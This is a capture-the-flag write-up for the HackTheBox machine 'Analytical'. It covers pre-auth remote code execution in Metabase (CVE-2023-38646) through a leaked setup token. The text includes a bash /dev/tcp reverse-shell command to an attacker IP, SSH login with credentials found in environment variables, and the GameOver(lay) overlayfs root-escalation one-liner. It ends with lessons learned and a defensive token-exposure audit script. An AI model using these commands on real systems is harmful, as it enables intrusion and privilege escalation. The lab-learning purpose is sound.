## Initial Access

Vulnerable Metabase Analytics instance at http://data.analytical.htb (CVE-2023-38646).

PoC used: https://github.com/m3m0o/metabase-pre-auth-rce-poc

- Copy the `setup-token` value from http://data.analytical.htb/api/session/properties

![[Pasted image 20250217221824.png]]

Setup token: `249fa03d-fd94-4d5b-b94f-b4ebf3df681f`

```sh
# Listener on the attacking host
sudo nc -lnvp 4444

# Pre-auth RCE through the leaked setup token; the payload is a reverse shell back to the listener
python exploit2.py --url http://data.analytical.htb --token 249fa03d-fd94-4d5b-b94f-b4ebf3df681f --command "bash -i >& /dev/tcp/10.10.14.11/4444 0>&1"
```

Did this part in about 30 minutes too.

## Privesc

**Environment variables:** running `env` in the foothold shell reveals a username and password:

```txt
env
META_USER=metalytics
META_PASS=An4lytics_ds20223#
```

**Authenticating using SSH** with those credentials (quoted so the `#` cannot be misread by the shell; `$RHOST` is the target address):

```sh
sshpass -p 'An4lytics_ds20223#' ssh metalytics@$RHOST
```

I'll proceed to re-download the Sliver agent and re-enumerate.

GameOver(lay) privesc (Ubuntu overlayfs bug; yields a root shell):

```sh
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
```

## Lessons Learned

- Spent too much time tunnel-visioning on database dumping.
- Then I spent time tunnel-visioning on exotic Docker breakouts due to linpeas showing `/proc` in yellow/orange (supposedly 95% privesc vector), as well as asking ChatGPT for help, and just kept hitting that rabbit hole as if it was crack cocaine. Very silly; need to get over my own imposter syndrome. If something doesn't start cracking after 30 minutes, it's not my skills which are lacking, but rather me going down the wrong path.
- Never occurred to me to do "dumb shit" such as having a look at the environment variables, which revealed a username and password...
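As an added audit check from the defender's side (not part of this writeup or the PoC repository), the script below tells you whether a Metabase instance still answers the unauthenticated `/api/session/properties` call with a live `setup-token`, the condition the Initial Access section relies on. The sample response bodies are constructed, the `version.tag` field is assumed, and the script reports exposure without ever printing the token itself.

```python
# Added example: audit a Metabase instance for a publicly readable setup-token.
# Not code from the writeup; response shape below is assumed, samples are constructed.
import json
import sys
import urllib.request

# Constructed sample bodies shaped like /api/session/properties responses.
SAMPLE_EXPOSED = json.dumps({
    "version": {"tag": "v0.46.6"},
    "setup-token": "00000000-0000-0000-0000-000000000000",  # placeholder, not a real token
})
SAMPLE_SAFE = json.dumps({"version": {"tag": "v0.46.6"}, "setup-token": None})


def setup_token_exposed(body: str) -> bool:
    """True when the properties JSON carries a non-empty string setup-token.

    After setup completes, a patched instance returns null (or omits the key);
    an unauthenticated caller must never see the real value.
    """
    try:
        props = json.loads(body)
    except json.JSONDecodeError:
        return False  # not a Metabase properties document at all
    token = props.get("setup-token") if isinstance(props, dict) else None
    return isinstance(token, str) and token.strip() != ""


def audit_body(body: str) -> dict:
    """Summarise a properties body without echoing the token itself."""
    props = json.loads(body)
    version = props.get("version", {}).get("tag", "unknown")
    return {"version": version, "setup_token_exposed": setup_token_exposed(body)}


def fetch_properties(base_url: str, timeout: float = 5.0) -> str:
    """Unauthenticated GET of the properties endpoint on an instance you administer."""
    url = base_url.rstrip("/") + "/api/session/properties"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


if __name__ == "__main__":
    # Usage: python metabase_token_audit.py http://metabase.example.internal:3000
    # Without an argument the constructed SAMPLE_EXPOSED body is audited instead.
    target = sys.argv[1] if len(sys.argv) > 1 else None
    body = fetch_properties(target) if target else SAMPLE_EXPOSED
    print(json.dumps(audit_body(body)))
```

A `true` in `setup_token_exposed` on a fully set-up instance means the Metabase build predates the fix for CVE-2023-38646 and should be upgraded or taken off the network until it is.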